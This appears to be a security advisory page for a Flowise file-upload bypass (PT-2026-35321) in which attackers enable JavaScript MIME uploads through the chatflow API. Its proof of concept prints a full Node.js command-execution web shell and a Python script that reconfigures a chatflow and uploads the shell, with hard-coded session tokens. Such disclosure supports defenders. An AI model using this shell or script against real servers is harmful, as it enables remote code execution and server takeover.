PT-2026-35321 · Npm · Flowise

Publicado

2026-04-16

·

Atualizado

2026-04-16

CVSS v3.1

7.1

Alta

VetorAV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Summary

In FlowiseAI, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE).

Details

This is a bypass of GHSA‑35g6‑rrw3‑v6xc (CVE‑2025‑61687). The Chatflow file upload settings do not properly validate MIME types. An attacker can add the application/javascript MIME type when updating a Chatflow, allowing .js files to be uploaded.
JavaScript files are not listed as an option for file upload types within web user interface: Screenshot 2026-01-08 152306

PoC

shell.js (Node.js Web Shell)

const { exec } = require('child process');
const http = require('http');

const server = http.createServer((req, res) => {
  const url = new URL(req.url, 'http://localhost');
  const cmd = url.searchParams.get('cmd');

  if (cmd) {
    console.log(`Executing: ${cmd}`);
    exec(cmd, (error, stdout, stderr) => {
      res.writeHead(200, {'Content-Type': 'text/plain'});
      if (error) {
        res.end(`Error: ${error.message}
${stderr || ''}`);
      } else {
        res.end(stdout || 'Command executed successfully');
      }
    });
  } else {
    res.writeHead(200, {'Content-Type': 'text/html'});
    res.end(`
      <h1>Node.js Web Shell</h1>
      <p>Use ?cmd=command to execute</p>
      <p>Example: ?cmd=id</p>
    `);
  }
});

const PORT = 8888;
server.listen(PORT, '0.0.0.0', () => {
  console.log(`Shell running on port ${PORT}`);
  console.log(`Access: http://localhost:${PORT}?cmd=id`);
});

Python Upload Script

import requests
import uuid

TARGET URL = "http://192.168.236.131:3000"
CHATFLOW ID = "dfd67fff-23b5-4f62-a0b3-59963cabc3b2"
cookie str = 'token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOTRiOGY2MTIyMzI3ZmFmODg0YzM4OGM4Y2YwZTg3ZGU6MTVkNDc4MDFjNTQ0N2Q3NDU2Mzg3OWE2N2E5YmJjNmM0M2JiYjYzNDE0Y2MzZWY2ZThkYjAzZTRhNjM3MjBiNzA5NmI3YmIwMGM3YWI3YTRmM2QzN2E2OTRiMGVmY2UzOTFiZGU3MWJiNWViZDIyN2ZhNzc0NmQ0ZjFmNTM5NTFhOGJkNjdlMzEyZjMzOTk5OWQ0ZGNkYmVmYWU3OWI4NSIsImlhdCI6MTc2Nzg1ODE2NSwibmJmIjoxNzY3ODU4MTY1LCJleHAiOjE3Njc4NjE3NjUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.lUtIFztKIT6Ld8cnPaPnPfm0B47yhurPJRW6JhtSwu8; refreshToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImEzZGNlMjgyLTE1ZDUtNDYwMi04MjI2LTc1MmQzYzExYzI5NyIsInVzZXJuYW1lIjoiYWRtaW4iLCJtZXRhIjoiOThmZGE5YWE2MDZhYTA3YTMxYjZlYzhjZTkyMmZkMDA6ZTU2ZTczMTEwYjY3ZDE3ZTM3MjViZWI2YzMyYWYzNTNkOWExNzIzZWU0NzdiN2ZiMDQ1N2Q0M2JmZTY0NTIxZTlkNjM2ZWQwODgxNWJiNzU4Mjg2ZDQ3OGMwNTA3NTRkZTgwMWIwODljNDQ5YjhhZjVkODU2YWFiMzk4NTBjNjNlZjRmY2UzMmY4YWYzZmQxNGQzMmVhYzVhYjVmM2NjZCIsImlhdCI6MTc2Nzg1MzU4NSwibmJmIjoxNzY3ODUzNTg1LCJleHAiOjE3NzU2Mjk1ODUsImF1ZCI6IkFVRElFTkNFIiwiaXNzIjoiSVNTVUVSIn0.U3mm0ONOeGFP1gD-mPT90Iz Ewwf-YXzmTPwoOEHG g; connect.sid=s%3Avwp7SDKi02Mzu nTF3-IZ-RfgmMnnp5o.K7kb5eg9CJ%2FuxupG4rJrT6I0fu0H93OTd5trNC0u88Y'
js mime type = 'application/javascript'
CHAT ID = str(uuid.uuid4())

def configure chatflow uploadfile():
  url = f"{TARGET URL}/api/v1/chatflows/{CHATFLOW ID}"
  headers = {'Cookie': cookie str, 'x-request-from': 'internal'}
  chatbot configdata = {"chatbotConfig":'{"fullFileUpload":{"status":true,"allowedUploadFileTypes":"' + js mime type + ',text/css,text/csv,text/html,application/json,text/markdown,application/x-yaml,application/pdf,application/sql,text/plain,application/xml,application/msword,application/vnd.openxmlformats-officedocument.wordprocessingml.document,application/vnd.openxmlformats-officedocument.spreadsheetml.sheet,application/vnd.openxmlformats-officedocument.presentationml.presentation","pdfFile":{"usage":"perPage","legacyBuild":false}}}'}
  r = requests.put(url, headers=headers, json = chatbot configdata)

  if js mime type in r.text:
    print("[+] Enabled .js file uploads")
  else:
    print("[-] Failed to enable .js file uploads")

def upload shell():
  url = f"{TARGET URL}/api/v1/attachments/{CHATFLOW ID}/{CHAT ID}"
  headers = {'Cookie': cookie str}
  files = {'files': ('shell.js', open('shell.js', 'rb'), 'application/javascript')}
  r = requests.post(url, headers=headers, files=files)

  if r.status code == 200:
    print("[+] Upload success")
    print(r.text)
  else:
    print(f"[-] Upload failed ({r.status code})")
    print(r.text)

if  name  == " main ":
  configure chatflow uploadfile()
  upload shell()
image

Impact

An attacker can persistently upload and store malicious web shells on the server. If executed, this leads to Remote Code Execution (RCE). The risk increases if administrators unknowingly trigger the shell or if other vulnerabilities are chained to execute the file. This presents a high-severity threat to system integrity and confidentiality.

Correção

Unrestricted File Upload

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

GHSA-RH7V-6W34-W2RR

Produtos afetados

Flowise